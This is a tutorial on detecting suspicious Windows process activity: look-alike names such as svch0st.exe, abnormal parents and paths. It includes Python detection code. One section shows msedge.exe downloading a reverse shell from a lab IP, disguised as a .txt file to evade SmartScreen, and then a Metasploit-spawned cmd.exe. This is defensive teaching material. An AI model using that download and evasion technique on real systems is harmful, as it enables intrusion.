Suspicious Process Activity

Techniques:

Hiding in Plain Sight

“Hiding in Plain Sight” means naming a malicious binary after a legitimate Windows process but swapping one character for a look-alike, typically a letter for a digit (o for 0, l for 1), so the name passes a quick glance in a process list.
For example: svch0st.exe vs svchost.exe


Original svchost.exe:

Our fake: svch0st.exe

As the picture above shows, several fields help separate the legitimate process from the malicious one: the parent process, the image file name and path, the number of instances, and whether the binary's signature is verified (the fake shows as unverified).

Here is the normal information for svchost.exe:
Process Name: svchost.exe
File Path: %systemroot%\System32\svchost.exe
Parent Process: services.exe
Number of instances: more than one
One tool that is helpful for learning a binary's normal behavior is EchoTrail.
Link: https://www.echotrail.io/

Living off the Land Binaries (LOLBAS)

Using the built-in Windows binaries already present on the system to carry out malicious actions, so no new tooling has to be dropped before the payload itself.
Reference: https://lolbas-project.github.io/#
In this example we use msedge.exe to download a reverse shell and then spawn a command shell to execute a command.
With smart screen:


The picture below shows Microsoft Edge being used to download the reverse shell, served as svch0st.exe.txt. Giving the payload a .txt extension instead of .exe avoids the SmartScreen download warning shown in the previous picture.
Command: `msedge.exe http://192.168.109.6:9000/svch0st.exe.txt`



Suspicious Parent-Child Relationship

One example of a suspicious parent-child relationship is winword.exe (Microsoft Word) or msedge.exe spawning a command prompt; neither a word processor nor a browser has a normal reason to launch cmd.exe.
In the picture below, through Metasploit, I spawned cmd.exe with the command “shell”. Then I executed a command that creates a file called “textone” containing the text “Hello”.
All of this activity runs under the process msedge.exe.





Process Hacker Perspective:

As you can see above, the parent process of cmd.exe is msedge.exe, which means msedge.exe spawned cmd.exe. That is not normal activity for a browser.

SIEM Perspective:


If an adversary spawns cmd.exe from msedge.exe, note the process ID and parent process ID of cmd.exe in the process-creation event and follow the chain of parent IDs to reconstruct the full line of execution.
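The chain-following described above, as an added example that is not code from the original post: the events are constructed in the style of Sysmon Event ID 1 records (fields Image, ProcessId, ParentProcessId, CommandLine), and the PIDs, paths and command lines are hypothetical. The code rebuilds the ancestry of a given PID and flags any command interpreter launched by a browser or Office application.

```python
"""Reconstruct a parent-child chain from process-creation events and flag
shell spawns from browsers and Office applications.

Added example; not code from the original post. Events are constructed in the
style of Sysmon Event ID 1; PIDs, paths and command lines are hypothetical.
"""
import ntpath

# Parents that should not normally launch a command interpreter.
USER_APP_PARENTS = {"msedge.exe", "chrome.exe", "firefox.exe",
                    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children whose launch from those parents is worth alerting on.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation events (one dict per Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"ProcessId": 3012, "ParentProcessId": 2900, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 4120, "ParentProcessId": 3012,
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "msedge.exe http://192.168.109.6:9000/svch0st.exe.txt"},
    {"ProcessId": 4388, "ParentProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    # A user opening a prompt from Explorer: benign, must not be flagged.
    {"ProcessId": 5002, "ParentProcessId": 3012, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
]


def index_by_pid(events):
    """Map ProcessId -> event. PIDs are reused after a process exits, so a real
    pipeline should key on Sysmon's ProcessGuid (or PID plus creation time)."""
    return {e["ProcessId"]: e for e in events}


def image_name(event):
    """Lower-cased file name of the executable, e.g. 'cmd.exe'."""
    return ntpath.basename(event["Image"]).lower()


def ancestry(events, pid):
    """Walk ParentProcessId links upward and return the image names from pid to
    the highest ancestor we hold an event for (stops at an unknown PID or a cycle)."""
    by_pid = index_by_pid(events)
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def suspicious_spawns(events):
    """Return (parent_image, child_image, child_pid, child_cmdline) for every
    shell launched by a browser or Office application."""
    by_pid = index_by_pid(events)
    hits = []
    for e in events:
        child = image_name(e)
        parent = by_pid.get(e["ParentProcessId"])
        if parent is None or child not in SHELL_CHILDREN:
            continue
        if image_name(parent) in USER_APP_PARENTS:
            hits.append((image_name(parent), child, e["ProcessId"], e["CommandLine"]))
    return hits


if __name__ == "__main__":
    for parent, child, pid, cmdline in suspicious_spawns(SAMPLE_EVENTS):
        print(f"{parent} -> {child} (pid {pid}): {cmdline}")
        print("  chain:", " <- ".join(ancestry(SAMPLE_EVENTS, pid)))
```

Sysmon also records ParentImage directly on each event, which is enough for the single-hop rule; walking the chain is what gives you the whole line of execution back to explorer.exe, which is the view a SIEM analyst wants when triaging the alert.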



Suspicious Binaries Path

Core Windows processes normally run from C:\Windows\System32\ (their 32-bit copies from C:\Windows\SysWOW64\). A process carrying one of those names but residing outside those directories raises suspicion.


As you can see from the picture above, svch0st.exe resides in C:\Users\jKing\Downloads, which is awfully suspicious: the real svchost.exe resides in C:\Windows\System32.
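The baseline comparison from the “Hiding in Plain Sight” section (name, path, parent) and the path check from this section, combined in one added example that is not code from the original post. BASELINE is a small constructed subset of what a source such as EchoTrail gives you, %systemroot% is assumed to be C:\Windows, and the process records at the bottom are constructed to mirror the screenshots, not real captures. It goes a little beyond the post's o-for-0 case by also catching other digit swaps and single-character typos of a core process name.

```python
"""Check a process record (name, path, parent) against a baseline of core
Windows processes: look-alike names, unexpected directories, unexpected parents.

Added example; not code from the original post. BASELINE is a constructed
subset and the sample records are constructed, not real captures.
"""
import ntpath

# Hypothetical baseline: expected directories and parents per core process,
# lower-cased for comparison. A real table would be far larger.
BASELINE = {
    "svchost.exe":  {"dirs": {r"c:\windows\system32", r"c:\windows\syswow64"},
                     "parents": {"services.exe"}},
    "services.exe": {"dirs": {r"c:\windows\system32"}, "parents": {"wininit.exe"}},
    "lsass.exe":    {"dirs": {r"c:\windows\system32"}, "parents": {"wininit.exe"}},
    "explorer.exe": {"dirs": {r"c:\windows"}, "parents": {"userinit.exe"}},
}

# Digit-for-letter substitutions seen in look-alike names (svch0st, 1sass, ...).
_CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def canonical_name(name):
    """Lower-case the name and undo common digit-for-letter swaps."""
    return name.lower().translate(_CONFUSABLES)


def edit_distance(a, b):
    """Plain Levenshtein distance; catches dropped or swapped letters (svhost.exe)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name):
    """Return the baseline name this one imitates, or None if it is not a look-alike."""
    lowered = name.lower()
    if lowered in BASELINE:
        return None  # exact legitimate name; judged on path and parent instead
    canon = canonical_name(lowered)
    for known in BASELINE:
        if canon == known or edit_distance(lowered, known) <= 1:
            return known
    return None


def check_process(proc):
    """Return a list of (finding, detail) for a record {name, path, parent}."""
    findings = []
    name = proc["name"].lower()
    expected_name = name if name in BASELINE else lookalike_of(name)
    if expected_name is None:
        return findings  # neither a core process name nor imitating one
    if expected_name != name:
        findings.append(("lookalike_name", f"{proc['name']} imitates {expected_name}"))
    expected = BASELINE[expected_name]
    directory = ntpath.dirname(proc["path"]).lower()
    if directory not in expected["dirs"]:
        findings.append(("unexpected_path",
                         f"{proc['path']} is not under {sorted(expected['dirs'])}"))
    if proc["parent"].lower() not in expected["parents"]:
        findings.append(("unexpected_parent",
                         f"parent {proc['parent']} not in {sorted(expected['parents'])}"))
    return findings


# Constructed records (hypothetical paths and user), mirroring the post's screenshots.
SAMPLE_PROCESSES = [
    {"name": "svchost.exe", "path": r"C:\Windows\System32\svchost.exe", "parent": "services.exe"},
    {"name": "svch0st.exe", "path": r"C:\Users\jKing\Downloads\svch0st.exe", "parent": "explorer.exe"},
    {"name": "svchost.exe", "path": r"C:\Users\jKing\Downloads\svchost.exe", "parent": "explorer.exe"},
    {"name": "notepad.exe", "path": r"C:\Windows\System32\notepad.exe", "parent": "explorer.exe"},
]

if __name__ == "__main__":
    for proc in SAMPLE_PROCESSES:
        for finding, detail in check_process(proc):
            print(f"{proc['name']:12} {finding:18} {detail}")
```

The third sample record is the case the name check alone would miss: a binary that uses the exact name svchost.exe but runs from Downloads under explorer.exe, which is why path and parent are checked even when the name is legitimate.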

That’s all I wanted to cover.